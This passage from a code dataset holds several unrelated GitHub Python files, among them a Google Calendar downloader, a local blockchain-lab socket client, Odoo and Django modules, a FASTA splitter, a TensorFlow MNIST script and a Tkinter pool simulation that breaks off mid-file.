action='count')\n args = parser.parse_args()\n\n log_level = {1: WARNING, 2: INFO, 3: DEBUG}.get(args.verbose, ERROR)\n set_ntfs_log_level(log_level)\n\n main(args.volume_letter, args.file_name)\n","repo_name":"dan1994/ntfs_parser","sub_path":"ntfs_parser.py","file_name":"ntfs_parser.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16564587359","text":"\"\"\"Support code for dealing with stereotypes in diagrams.\"\"\"\n\nfrom gaphor.core.format import format\nfrom gaphor.core.styling import 
JustifyContent, TextAlign\nfrom gaphor.diagram.shapes import Box, Text, draw_top_separator\n\n\ndef stereotype_watches(presentation):\n presentation.watch(\"subject.appliedStereotype\", presentation.update_shapes).watch(\n \"subject.appliedStereotype.classifier.name\"\n ).watch(\"subject.appliedStereotype.slot\", presentation.update_shapes).watch(\n \"subject.appliedStereotype.slot.definingFeature.name\"\n ).watch(\"subject.appliedStereotype.slot.value\", presentation.update_shapes)\n\n\ndef stereotype_compartments(subject):\n return filter(\n None,\n (\n _create_stereotype_compartment(appliedStereotype)\n for appliedStereotype in subject.appliedStereotype\n )\n if subject\n else [],\n )\n\n\ndef _create_stereotype_compartment(appliedStereotype):\n def lazy_format(slot):\n return lambda: format(slot)\n\n slots = [slot for slot in appliedStereotype.slot if slot.value]\n\n if slots:\n return Box(\n Text(\n text=lazy_format(appliedStereotype.classifier[0])\n if appliedStereotype.classifier\n else \"\",\n style={\"padding\": (0, 0, 4, 0)},\n ),\n *(\n Text(text=lazy_format(slot), style={\"text-align\": TextAlign.LEFT})\n for slot in slots\n ),\n style={\n \"padding\": (4, 4, 4, 4),\n \"min-height\": 8,\n \"justify-content\": JustifyContent.START,\n },\n draw=draw_top_separator,\n )\n return None\n","repo_name":"gaphor/gaphor","sub_path":"gaphor/UML/classes/stereotype.py","file_name":"stereotype.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":1536,"dataset":"github-code","pt":"19"} +{"seq_id":"27872360039","text":"from __future__ import annotations\r\n\r\nimport datetime\r\nimport os\r\nimport time\r\nimport traceback\r\nfrom pprint import pprint as pp\r\nfrom typing import Any, Optional\r\n\r\n# Google imports\r\nfrom google.auth.exceptions import RefreshError\r\nfrom google.auth.transport.requests import Request\r\nfrom google.oauth2.credentials import Credentials\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom googleapiclient.discovery import Resource, build\r\n\r\nfrom neverlate.utils import app_local_data_dir, now_datetime\r\n\r\n# from googleapiclient.errors import HttpError\r\n\r\n# If modifying these scopes, delete the file token.json.\r\nSCOPES = [\"https://www.googleapis.com/auth/calendar.readonly\"]\r\n\r\nEMAIL = None\r\n\r\n\r\nclass Calendar:\r\n \"\"\"\r\n Google calendar data model\r\n \"\"\"\r\n\r\n summary: str\r\n id: str\r\n primary: bool\r\n selected: bool # Is the user displaying the calendary by default\r\n\r\n def __init__(self, data: dict[Any, Any]) -> None:\r\n self._data = data\r\n self.id = data[\"id\"]\r\n self.primary = data.get(\"primary\", False)\r\n self.summary = data.get(\"summaryOverride\", data.get(\"summary\", \"\"))\r\n if self.primary:\r\n self.selected = True\r\n elif self.summary == \"Birthdays\" or self.summary.lower().startswith(\"holiday\"):\r\n self.selected = False\r\n else:\r\n self.selected = data.get(\"selected\", False)\r\n\r\n def __repr__(self):\r\n if self.primary:\r\n return \"\"\r\n return (\r\n \"\"\r\n )\r\n\r\n\r\nclass TimeEvent:\r\n \"\"\"\r\n Calendar event data model for time-based events (not all day events).\r\n \"\"\"\r\n\r\n calendar: Calendar\r\n\r\n def __init__(self, item: dict[Any, Any], calendar: Calendar):\r\n \"\"\"\r\n Create the time event.\r\n\r\n Args:\r\n item (dict): Dictionary result from event query.\r\n calendar (Calendar): Calendar this event belongs to.\r\n\r\n Raises:\r\n ValueError: If item is not valid/not a valid event with a start 
date and time.\r\n \"\"\"\r\n if (\r\n \"start\" not in item\r\n or \"dateTime\" not in item[\"start\"]\r\n or item.get(\"eventType\", \"default\")\r\n != \"default\" # or ['default', 'focusTime', 'outOfOffice']:\r\n ):\r\n raise ValueError(\"Invalid data type - not a calendar event\")\r\n self.calendar = calendar\r\n self._event = item # type: dict[str, Any]\r\n self.summary = self._event.get(\"summary\", \"\")\r\n\r\n # Get start and end times as datetime objects\r\n st_time = self._event[\"start\"][\"dateTime\"]\r\n self.start_time = datetime.datetime.fromisoformat(st_time)\r\n # self.start_time = datetime.datetime.strptime(st_time[:19], \"%Y-%m-%dT%H:%M:%S\")\r\n end_time = self._event[\"end\"][\"dateTime\"]\r\n self.end_time = datetime.datetime.fromisoformat(end_time)\r\n self.id = \"::\".join(\r\n (\r\n self._event[\"id\"],\r\n self.start_time.isoformat(),\r\n self.get_video_url(),\r\n )\r\n )\r\n\r\n def __repr__(self):\r\n return (\r\n \"\"\r\n )\r\n\r\n def get_seconds_till_event(self) -> float:\r\n return (self.start_time - now_datetime()).total_seconds()\r\n\r\n def get_video_url(self) -> str:\r\n entry_points = self._event.get(\"conferenceData\", {}).get(\"entryPoints\", [])\r\n for entry_point in entry_points:\r\n if entry_point.get(\"entryPointType\", \"\") == \"video\":\r\n return entry_point[\"uri\"]\r\n\r\n # Occasionally there are events with links that aren't categorized but have URIs...\r\n for entry_point in entry_points:\r\n if \"entryPointType\" not in entry_point and entry_point.get(\"uri\"):\r\n return entry_point.get(\"uri\")\r\n return \"\"\r\n\r\n def has_declined(self) -> bool:\r\n for attendee in self._event.get(\"attendees\", []):\r\n # if attendee[\"email\"] == \"bwalters@wayfair.com\":\r\n return attendee[\"responseStatus\"] == \"declined\"\r\n return False\r\n\r\n def has_ended(self) -> bool:\r\n return (self.end_time - now_datetime()).total_seconds() < 0\r\n\r\n\r\nclass GoogleCalDownloader: # (QObject):\r\n \"\"\"Interface with Google. 
Credentials, downloading calendars, and downloading events.\"\"\"\r\n\r\n primary_calendar: Calendar # TODO: not used?\r\n calendars: list[Calendar] = []\r\n events: list[TimeEvent] = []\r\n last_update_time: float = 0.0\r\n\r\n # events_gathered_signal = Signal(list[Calendar])\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.service = None\r\n # self.service = build(\"calendar\", \"v3\", credentials=self.creds) # type: Resource\r\n self._cred_file_path = os.path.join(\r\n os.path.dirname(__file__), \"credentials.json\"\r\n )\r\n\r\n self.user_token_file_path = os.path.join(app_local_data_dir(), \"token.json\")\r\n\r\n def logout(self):\r\n \"\"\"\r\n Remove the user token file and disconnect the service.\r\n \"\"\"\r\n if os.path.exists(self.user_token_file_path):\r\n os.remove(self.user_token_file_path)\r\n\r\n self.service = None\r\n\r\n def login(self, require_existing_credentials: bool = False) -> bool:\r\n \"\"\"Gets google authentication credentails.\"\"\"\r\n creds = self.get_existing_credentials()\r\n if require_existing_credentials and not creds:\r\n return False\r\n if not creds:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n self._cred_file_path, SCOPES\r\n )\r\n creds = flow.run_local_server(port=0)\r\n\r\n # Save the credentials for the next run\r\n with open(self.user_token_file_path, \"w\") as token_file:\r\n token_file.write(creds.to_json())\r\n\r\n self.service = build(\"calendar\", \"v3\", credentials=creds) # type: Resource\r\n return True\r\n\r\n def get_existing_credentials(self) -> Credentials | None:\r\n \"\"\"\r\n Check if we have valid credentials or not.\r\n\r\n Returns:\r\n Credentials|None\r\n \"\"\"\r\n creds = None\r\n if not os.path.exists(self.user_token_file_path):\r\n return None\r\n creds = Credentials.from_authorized_user_file(self.user_token_file_path, SCOPES)\r\n if creds.valid:\r\n return creds\r\n if creds.expired and creds.refresh_token:\r\n try:\r\n creds.refresh(Request())\r\n\r\n # Save the credentials for the next run\r\n with open(self.user_token_file_path, \"w\") as token_file:\r\n token_file.write(creds.to_json())\r\n return creds\r\n except RefreshError:\r\n return None\r\n\r\n def update_calendars(self) -> None:\r\n result = self.service.calendarList().list().execute()\r\n cal_ids = []\r\n for cal in result[\"items\"]:\r\n if 0:\r\n print(\"=\" * 80)\r\n pp(cal)\r\n continue\r\n if cal.get(\"deleted\"):\r\n continue\r\n cal = Calendar(cal)\r\n cal_ids.append(cal)\r\n\r\n self.calendars = cal_ids\r\n\r\n def update_events(self, calendars: Optional[list[Calendar]] = None) -> None:\r\n events = []\r\n if calendars is None:\r\n calendars = self.calendars\r\n\r\n for calendar in calendars:\r\n events += self.get_events(calendar)\r\n self.events = events\r\n self.last_update_time = time.time()\r\n # self.events_gathered_signal.emit()\r\n\r\n def get_events(self, calendar: Calendar) -> list[TimeEvent]:\r\n \"\"\"Get amazing events.\r\n\r\n Args:\r\n calendar (Calendar): calendar to get events from.\r\n\r\n Returns:\r\n list[TimeEvent]\r\n \"\"\"\r\n # Call the Calendar API\r\n\r\n # now_ = datetime.datetime.utcnow().isoformat() + \"Z\" # 'Z' indicates UTC time\r\n # time_min = now.replace(hour=0, minute=0, second=0, microsecond=0)\r\n # time_max = now.replace(hour=23, minute=59, second=59, microsecond=0)\r\n now_ = now_datetime()\r\n time_min = now_.replace(hour=0, minute=0, second=0)\r\n time_max = now_.replace(hour=23, minute=59, second=59)\r\n # print(\"Cal:\", calendar.summary, \"---\", calendar.id)\r\n events_query = 
self.service.events().list( # type: ignore\r\n calendarId=calendar.id,\r\n maxAttendees=1,\r\n timeMin=time_min.isoformat(),\r\n timeMax=time_max.isoformat(),\r\n maxResults=250,\r\n singleEvents=True,\r\n # orderBy=\"startTime\",\r\n )\r\n events_result = events_query.execute()\r\n\r\n # pp(events_result)\r\n # print(\" Items:\", len(events_result[\"items\"]))\r\n\r\n items = events_result.get(\"items\", [])\r\n result = []\r\n # Prints the start and name of the next 10 events\r\n for item in items:\r\n try:\r\n event = TimeEvent(item, calendar)\r\n except ValueError:\r\n # print(\"Invalid event\", item.get(\"summary\", \"\"))\r\n continue\r\n except:\r\n # Unknown error needs to be handled\r\n print(traceback.format_exc())\r\n continue\r\n result.append(event)\r\n\r\n return result\r\n\r\n\r\nif __name__ == \"__main__\":\r\n gcal = GoogleCalDownloader()\r\n gcal.update_calendars()\r\n gcal.update_events()\r\n","repo_name":"beewally/neverlate","sub_path":"neverlate/google_cal_downloader.py","file_name":"google_cal_downloader.py","file_ext":"py","file_size_in_byte":10483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35346635329","text":"\"\"\"Test environments.\"\"\"\nfrom gym.spaces import Discrete\nfrom gym.wrappers import TimeLimit\nfrom hypothesis import given\nfrom hypothesis.strategies import floats, integers, lists\n\nfrom src import NonMarkovianRotatingMAB\n\n\nclass BaseTestRotMAB:\n \"\"\"Base test class for RotMAB environment.\"\"\"\n\n def __init__(self, winning_probs, max_steps):\n \"\"\"Initialize test class.\"\"\"\n self.winning_probs = winning_probs\n self.max_steps = max_steps\n self.env = TimeLimit(\n NonMarkovianRotatingMAB(winning_probs=self.winning_probs),\n max_episode_steps=self.max_steps,\n )\n\n def test_action_space(self):\n \"\"\"Test action spaces.\"\"\"\n assert self.env.action_space == Discrete(len(self.winning_probs))\n\n def test_observation_space(self):\n \"\"\"Test observation spaces.\"\"\"\n assert self.env.observation_space == Discrete(2)\n\n def test_interaction(self):\n \"\"\"Test interaction with Rotating MAB.\"\"\"\n self.env.seed()\n state = self.env.reset()\n assert state == 0\n\n def assert_consistency(obs, reward):\n \"\"\"Assert obs = 1 iff reward = 1.\"\"\"\n positive_reward = reward > 0.0\n positive_obs = obs == 1\n assert (\n positive_reward\n and positive_obs\n or (not positive_reward and not positive_obs)\n )\n\n for _i in range(self.max_steps - 1):\n action = self.env.action_space.sample()\n obs, reward, done, info = self.env.step(action)\n assert_consistency(obs, reward)\n assert not done\n\n # last action\n obs, reward, done, info = self.env.step(0)\n assert_consistency(obs, reward)\n assert done\n\n\n@given(\n winning_probs=lists(floats(0.0, 1.0), min_size=1, max_size=200),\n max_steps=integers(min_value=1, max_value=200),\n)\ndef test_robmabs(winning_probs, max_steps):\n \"\"\"Test many instances of rotmabs.\"\"\"\n test = BaseTestRotMAB(winning_probs, max_steps)\n\n test.test_action_space()\n test.test_observation_space()\n test.test_interaction()\n","repo_name":"marcofavorito/PAC-RDPs-code","sub_path":"tests/test_envs/test_rotmab.py","file_name":"test_rotmab.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"70362576683","text":"import json\nimport socket\n\ndef kill_node(id,address):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n 
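# Assumed port scheme (it matches the connect call below): node i listens on TCP port 8080+i.\n        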
s.connect((address, 8080+id))\n m = json.dumps({'sender':'kill','type':'kill', 'message':'kill'})\n s.sendall(bytes(m,\"utf-8\"))\n s.close()\n\n\ndef kill_all_nodes(n,address):\n for i in range(n):\n kill_node(i+1,address)\n\n\n\n\n\ndef client(n,ip):\n on = 1\n while on:\n addr = input(\"address ? \")\n port = int(input(\"port ? \"))\n if port == 0:\n kill_all_nodes(n,ip)\n on = 0\n break\n\n type = input('command ? ')\n jsonb = None\n\n if type == \"create_transaction\":\n sender = int(input('sender ? '))\n receiver = int(input('receiver ? '))\n amount = int(input('amount ? '))\n\n jsonb = {\"type\": type, 'transaction':{'sender':sender,'receiver':receiver,'amount':amount}}\n\n elif type == \"fake\":\n jsonb = {\"type\": type, 'transaction':{'sender':12,'receiver':23,'amount':100}}\n\n else:\n jsonb = {\"type\": type}\n data_send = json.dumps(jsonb)\n\n \n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind((ip,8080))\n s.connect((addr, port))\n s.sendall(bytes(data_send,\"utf-8\"))\n s.shutdown(socket.SHUT_RDWR) \n\n\n\nclient(6,'127.0.0.1')","repo_name":"Xioshiva/lab1-blockchain","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28735492191","text":"# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\nfrom odoo import models\n\n\nclass AccountInvoice(models.Model):\n\n _inherit = 'account.invoice'\n\n def action_invoice_open(self):\n res = super().action_invoice_open()\n for invoice in self:\n if invoice.type == 'in_invoice':\n for line in invoice.invoice_line_ids:\n pur_line = line.purchase_line_id\n if pur_line and line.price_subtotal > 0 and \\\n line.product_id.cost_method == 'fifo':\n inv_price = line._get_stock_move_price_unit()\n for move in pur_line.move_ids:\n if move._is_in() and move.remaining_qty > 0:\n remaining_value = move.remaining_qty * \\\n inv_price\n move.write({\n 'remaining_value': remaining_value})\n return res\n\n\nclass AccountInvoiceLine(models.Model):\n\n _inherit = 'account.invoice.line'\n\n def _get_stock_move_price_unit(self):\n self.ensure_one()\n invoice = self.invoice_id\n price_unit = self.price_unit\n if self.invoice_line_tax_ids:\n price_unit = self.invoice_line_tax_ids.with_context(\n round=False).compute_all(\n price_unit, currency=self.invoice_id.currency_id,\n quantity=1.0, product=self.product_id,\n partner=self.invoice_id.partner_id\n )['total_excluded']\n if self.uom_id.id != self.product_id.uom_id.id:\n price_unit *= self.uom_id.factor / self.product_id.uom_id.factor\n if invoice.currency_id != invoice.company_id.currency_id:\n price_unit = invoice.currency_id.with_context(\n date=invoice.date).compute(\n price_unit, invoice.company_id.currency_id, round=False)\n if self.discount:\n return price_unit * (1 - self.discount / 100)\n return price_unit\n","repo_name":"pranav-1into2/Minsk","sub_path":"external_modules/account_invoice_move_cost/models/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"33000621687","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom hospital import settings\nfrom hospital_app import views\nfrom django.conf.urls.static import static\nurlpatterns = [\n path('', views.user_login, name ='home'),\n 
path('index',views.index),\n path('signin',views.user_login, name ='signin'),\n path('create_user', views.create_user),\n path('signout', views.signout, name ='signout'),\n path('reg', views.reg, name='reg'),\n path('record',views.records, name='record'),\n path('update/',views.update, name='update'),\n path('updated/',views.updated,name='updated'),\n path('delete/',views.delete,name='delete'),\n path('del2/',views.del2),\n path('check_in',views.check_in,name='check_in'),\n path('reg_det',views.reg_det,name=\"reg_det\"),\n path('check2',views.check2),\n path('check3',views.check3),\n path('logs',views.logs),\n path('appointment-page',views.appointment),\n path('staff',views.staff),\n path('newstaff',views.newstaff),\n path('staffrec',views.managestaff),\n path('appointments',views.appointments),\n path('vitals',views.vitals),\n path('select/',views.select),\n path('doctors',views.doctors),\n path('action1//',views.action1),\n path('getdoc',views.getdoc),\n path('error',views.error),\n path('first',views.first_page),\n path('second_page',views.second_page),\n path('lab',views.lab),\n path('lab2/',views.lab2),\n path('messages', views.message),\n path('message2/',views.message2),\n path('message',views.message_search),\n path('print/',views.printc),\n path('qrcode',views.qr_gen),\n path('patient_details',views.p_details)\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"ofe14/HOSPTAL-MANAGEMENT-SYSTEM","sub_path":"hospital_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13812746949","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\nimport os\nimport shutil\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom deep_MNIST_model import DeepNeuralNetwork\n\nimport tensorflow as tf\n\nFLAGS = None\n\n\ndef main(_):\n # Import data\n mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)\n\n # Create the model\n x = tf.placeholder(tf.float32, [None, 784], name='input')\n y_ = tf.placeholder(tf.float32, [None, 10], name='answer')\n\n # Build the graph for the deep net\n model = DeepNeuralNetwork()\n y_conv, keep_prob = model.deepnn(x)\n\n with tf.name_scope('loss'):\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv)\n cross_entropy = tf.reduce_mean(cross_entropy)\n\n with tf.name_scope('adam_optimizer'):\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\n with tf.name_scope('accuracy_check'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n correct_prediction = tf.cast(correct_prediction, tf.float32)\n accuracy = tf.reduce_mean(correct_prediction)\n tf.add_to_collection('accuracy', accuracy)\n\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(300):\n batch = mnist.train.next_batch(50)\n if i % 100 == 0:\n train_accuracy = sess.run(accuracy, feed_dict={\n x: batch[0], y_: batch[1], keep_prob: 1.0})\n print('step %d, training accuracy %g' % (i, train_accuracy))\n sess.run(train_step, feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n\n print('test accuracy %g' % sess.run(accuracy, feed_dict={\n x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\n save_path = \"models/deep_MNIST_save/ver1.2\"\n if os.path.exists(save_path):\n 
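# Clear any stale checkpoint directory from a previous run before saving again.\n            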
shutil.rmtree(save_path)\n        os.mkdir(save_path)\n        saver.save(sess, save_path)\n        print(\"Model saved in file: %s\" % save_path)\n\n    with tf.Session() as new_sess:\n        # new_saver = tf.train.import_meta_graph('models/deep_MNIST_save/ver1.1.meta')\n        print(\"Loading model from file: %s\" % save_path)\n\n        new_saver = tf.train.Saver()\n        new_saver.restore(new_sess, save_path)\n        print(\"Model is restored: %s\" % save_path)\n        new_accuracy = tf.get_collection('accuracy')[0]\n        print('test new_accuracy %g' % new_accuracy.eval(feed_dict={\n            x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--data_dir', type=str,\n                        default='/tmp/tensorflow/mnist/input_data',\n                        help='Directory for storing input data')\n    FLAGS, unparsed = parser.parse_known_args()\n    tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"sgr0416st/tensorflow","sub_path":"deep_MNIST_save_ver1.2.py","file_name":"deep_MNIST_save_ver1.2.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70546867565","text":"#!/usr/bin/env python\n#\n# splits a multi-fasta file into single-sequence files, named by gene id\n\nimport argparse\nimport logging\nimport os\nimport sys\nimport traceback\n\nclass NumSeqReachedException(Exception):\n    pass\n\n\nclass Sequence(object):\n\n    def __init__(self, accession, geneid, sequence=\"\"):\n        self.accession = accession\n        self.geneid = geneid\n        self.sequence = sequence\n\n    def addsequence(self, sequence):\n        self.sequence += sequence\n    \n    def asfasta(self):\n        s = \">%s|%s\\n%s\" % ( self.accession, self.geneid, self.sequence)\n        return s\n\n\nclass ProcessingRun(object):\n    \n    def __init__(self, filelist, workdir, numseq):\n        self.log = logging.getLogger()\n        self.filelist = filelist\n        self.workdir = os.path.expanduser(workdir)\n        self.workdir = os.path.abspath(self.workdir)\n        if not os.path.exists(self.workdir):\n            os.mkdir(self.workdir)\n            self.log.info(\"Created workdir %s\" % self.workdir)\n        self.numseq = int(numseq)\n        self.numoutput = 0\n\n    def outputlast(self, seq):\n        if seq is not None:\n            logging.debug(seq.asfasta())\n            try:\n                filename = '%s/%s.fasta' % (self.workdir, seq.geneid)\n                # a with-block closes the handle even on errors, and avoids the\n                # NameError the previous explicit fh.close() in a finally clause\n                # raised whenever open() itself failed\n                with open(filename, 'w') as fh:\n                    fh.write(seq.asfasta())\n                self.numoutput += 1\n            except IOError:\n                print(\"error opening file %s\" % filename)\n    \n    \n    def parsefile(self, filehandle):\n        current = None\n        try:\n            for line in filehandle:\n                if line.startswith(\">\"):\n                    if current is not None:\n                        current.addsequence(\"\\n\")\n                        self.outputlast(current)\n                        if self.numoutput >= self.numseq:\n                            raise NumSeqReachedException\n                    \n                    fields = line.split(\"|\")\n                    accession = fields[1]\n                    fields2 = fields[2].split()\n                    geneid = fields2[0]\n                    logging.debug('header: accessno=%s id=%s' % (accession, geneid))\n                    current = Sequence(accession, geneid)\n                elif line.strip().startswith(\"#\"):\n                    pass\n                else:\n                    s = line.strip()\n                    current.addsequence(s)                 \n        except NumSeqReachedException:\n            raise\n        \n        \n        except Exception as e:\n            traceback.print_exc(file=sys.stdout) \n\n    \n    def handlefiles(self):    \n        for filename in self.filelist:\n            filename = os.path.abspath(filename)\n            \n            try:\n                self.log.debug(\"opening file %s\" % filename)\n                filehandle = open(filename, 'r')\n                self.parsefile(filehandle)\n                filehandle.close()\n                \n            except FileNotFoundError:\n                self.log.error(\"No such file %s\" % filename)    \n            except NumSeqReachedException:\n                self.log.info(\"Desired number of sequences reached 
%d\" % self.numseq)\n \n\nif __name__ == '__main__':\n logging.basicConfig(format='%(asctime)s (UTC) [ %(levelname)s ] %(name)s %(filename)s:%(lineno)d %(funcName)s(): %(message)s')\n \n parser = argparse.ArgumentParser()\n \n parser.add_argument('-d', '--debug', \n action=\"store_true\", \n dest='debug', \n help='debug logging')\n\n parser.add_argument('-v', '--verbose', \n action=\"store_true\", \n dest='verbose', \n help='verbose logging')\n\n parser.add_argument('infiles', \n metavar='infiles', \n type=str, \n nargs='+',\n help='a list of .fasta sequence files')\n \n parser.add_argument('-w', '--workdir', \n action=\"store\", \n dest='workdir', \n default='~/work/cafa4-play/seqwork',\n help='run-specific workdir [~/work/cafa4-play/seqwork]')\n\n parser.add_argument('-n', '--numseq', \n action=\"store\", \n dest='numseq', \n default=100,\n help='number of sequences to process. ') \n \n \n args= parser.parse_args()\n \n if args.debug:\n logging.getLogger().setLevel(logging.DEBUG)\n if args.verbose:\n logging.getLogger().setLevel(logging.INFO)\n \n filelist = args.infiles \n run = ProcessingRun(filelist, args.workdir, args.numseq)\n run.handlefiles()\n\n\n ","repo_name":"jhover/cshlwork","sub_path":"attic/fastasplit.py","file_name":"fastasplit.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32229409448","text":"import Tkinter as TK\r\nimport math\r\nimport time\r\nimport random\r\n\r\nstart_time = time.time()\r\ntimes = [0]\r\ndef timer():\r\n return (time.time() - start_time)\r\n \r\n\r\nroot = TK.Tk()\r\nroot.wm_title('MiniPool')\r\n\r\ndimensions = (1600,900)\r\ncanvas = TK.Canvas(root, width=dimensions[0], height=dimensions[1], background='#FFFFFF')\r\ncanvas.grid(row=0, column=0, columnspan=4)\r\n\r\ntable_size = (1200,600)\r\nmargins = ((dimensions[0]-table_size[0])/2,(dimensions[1]-table_size[1])/2)\r\ncushion = {'left':margins[0],'top':margins[1],'right':margins[0]+table_size[0],'bottom':margins[1]+table_size[1]}\r\ncanvas.create_rectangle(cushion['left'],cushion['top'],cushion['right'],cushion['bottom'],fill='#1e7228')\r\n\r\nballs = []\r\nvels = []\r\nhit_x_cushion = []\r\nhit_y_cushion = []\r\ncollided = []\r\n\r\ndef create_ball(radius, color, x_pos, y_pos, x_vel, y_vel):\r\n balls.append(canvas.create_oval(x_pos - radius, y_pos - radius, x_pos + radius, y_pos + radius, fill = color, outline = color))\r\n vels.append([float(x_vel), float(y_vel)])\r\n hit_x_cushion.append(False)\r\n hit_y_cushion.append(False)\r\n \r\ndef hexstring(slider_int):\r\n '''A function to prepare data from controller's widget for view's consumption\r\n \r\n slider_intvar is an IntVar between 0 and 255, inclusive\r\n hexstring() returns a string representing two hexadecimal digits\r\n '''\r\n \r\n slider_hex = hex(slider_int)\r\n # Drop the 0x at the beginning of the hex string\r\n slider_hex_digits = slider_hex[2:] \r\n # Ensure two digits of hexadecimal:\r\n if len(slider_hex_digits)==1:\r\n slider_hex_digits = '0' + slider_hex_digits \r\n return slider_hex_digits\r\n\r\ndef rand8bit():\r\n return random.randint(0,255)\r\ndef randcolor():\r\n '''Takes three IntVar and returns a color Tkinter string like #FFFFFF. 
\r\n '''\r\n r=hexstring(rand8bit())\r\n g=hexstring(rand8bit())\r\n b=hexstring(rand8bit())\r\n return '#'+r+g+b\r\n\r\ndef randpos():\r\n return [random.randint(margins[0]+20, dimensions[0]-margins[0]-20),random.randint(margins[1]+20, dimensions[1]-margins[1]-20)]\r\n\r\ndef randvel():\r\n return random.uniform(-200,200)\r\n\r\nfor i in range(20):\r\n x,y = randpos()\r\n create_ball(20, randcolor(), x, y, randvel(), randvel())\r\ncushion_deflection = 1\r\nrolling_friction = 1\r\nmin_vel = 1\r\n\r\ndef arctan(x, y):\r\n x = float(x)\r\n y = float(y)\r\n if x == 0:\r\n if y > 0:\r\n angle = math.pi/2\r\n elif y < 0:\r\n angle = -math.pi/2\r\n else:\r\n angle = 2*math.pi # Does not matter what value is\r\n elif y == 0:\r\n if x > 0:\r\n angle = 0.0\r\n else:\r\n angle = math.pi\r\n else:\r\n angle = math.atan(y/x)\r\n return angle\r\n\r\ndef dot_product(v1, v2):\r\n if len(v1) == len(v2):\r\n t = 0\r\n for i in range(len(v1)):\r\n t += v1[i]*v2[i]\r\n return t\r\n else:\r\n raise IndexError('Input lists are unequal in length.')\r\n\r\ndef scalar_product(scalar, vector):\r\n v = []\r\n for d in vector:\r\n v.append(d*scalar)\r\n return v\r\n\r\ndef add_vectors(v1, v2):\r\n if len(v1) == len(v2):\r\n v = []\r\n for i in range(len(v1)):\r\n v.append(v1[i]+v2[i])\r\n return v\r\n else:\r\n raise IndexError('Input lists are unequal in length.')\r\n\r\ndef subtract_vectors(v1, v2):\r\n if len(v1) == len(v2):\r\n v = []\r\n for i in range(len(v1)):\r\n v.append(v1[i]-v2[i])\r\n return v\r\n else:\r\n raise IndexError('Input lists are unequal in length.')\r\n\r\ndef square_sum(v):\r\n t = 0\r\n for d in v:\r\n t += d**2\r\n return t\r\n\r\ndef ball_collision(ball_i):\r\n x1, y1, x2, y2 = canvas.coords(balls[ball_i])\r\n ball_center = [(x1+x2)/2., (y1+y2)/2.]\r\n ball_radius = (x2-x1)/2.\r\n for other_i in range(0, len(balls)):\r\n if ball_i != other_i:\r\n x1, y1, x2, y2 = canvas.coords(balls[other_i])\r\n other_center = [(x1+x2)/2., (y1+y2)/2.]\r\n other_radius = (x2-x1)/2.\r\n if test_collision(ball_center, ball_radius, other_center, other_radius):\r\n if sorted((ball_i, other_i)) not in collided:\r\n vels[ball_i], vels[other_i] = calculate_collision(ball_center, vels[ball_i], other_center, vels[other_i])\r\n collided.append(sorted((ball_i, other_i))) # record the pair; the original never appended, so the else branch below was dead code and overlapping balls were re-resolved every frame\r\n else:\r\n while sorted((ball_i, other_i)) in collided:\r\n collided.remove(sorted((ball_i, other_i)))\r\ndef test_collision(center1, radius1, center2, radius2):\r\n radial_distance = math.hypot(center1[0]-center2[0],center1[1]-center2[1])\r\n return (radius1 + radius2 >= radial_distance)\r\n\r\ndef calculate_collision(x1, v1, x2, v2):\r\n v1f = subtract_vectors(v1,scalar_product(float(dot_product(subtract_vectors(v1,v2),subtract_vectors(x1,x2)))/float(square_sum(subtract_vectors(x1,x2))),subtract_vectors(x1,x2)))\r\n v2f = subtract_vectors(add_vectors(v1,v2),v1f)\r\n return [v1f, v2f]\r\n\r\ndef animate():\r\n times.append(timer())\r\n ft = times[-1]-times[-2]\r\n for i in range(len(balls)):\r\n x1, y1, x2, y2 = canvas.coords(balls[i])\r\n if x1 <= cushion['left'] or x2 >= cushion['right']:\r\n if hit_x_cushion[i] == False:\r\n vels[i][0] = 